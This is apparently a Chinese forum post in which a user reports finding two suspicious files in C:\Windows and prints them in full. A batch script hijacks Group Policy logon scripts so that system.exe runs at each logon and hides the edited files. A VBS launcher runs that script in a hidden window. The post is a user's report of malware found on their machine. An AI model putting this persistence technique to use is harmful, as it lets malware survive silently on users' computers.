我搜索了一下"123",在系统文件夹C:\Windows下面发现了两个可疑文件
123.bat- @echo off
- md %windir%\system32\GroupPolicy\User\Scripts
- set di=%windir%\system32\GroupPolicy\User\Scripts
- attrib -a -s -r -h %di%\scripts.ini
- del %di%\scripts.ini /q
- echo.>%di%\scripts.ini
- echo [Logon] >>%di%\scripts.ini
- echo 0CmdLine=system.exe >>%di%\scripts.ini
- echo 0Parameters= >>%di%\scripts.ini
- attrib +s +a +r +h %di%\scripts.ini
- set ei=%windir%\system32\GroupPolicy
- attrib -a -s -r -h %ei%\gpt.ini
- del %ei%\gpt.ini /q
- echo [General]>%ei%\gpt.ini
- echo gPCUserExtensionNames=[{42B5FAAE-6536-11D2-AE5A-0000F87571E3}{40B66650-4972-11D1-A7CA-0000F87571E3}] >>%ei%\gpt.ini
- echo Version=65536 >>%ei%\gpt.ini
- attrib +s +a +r +h %ei%\gpt.ini
- md %windir%\system32\GroupPolicy\User\Scripts\Logon
- md %windir%\system32\GroupPolicy\User\Scripts\Logoff
- copy system.exe %di%\Logon /y
- gpupdate /force
复制代码 123.vbs- Set ws = CreateObject("Wscript.Shell")
- ws.run "cmd /c 123.bat",vbhide
复制代码 这俩的创建时间2013年9月20日0点19分
妥妥的木马,居然潜伏了这么久! |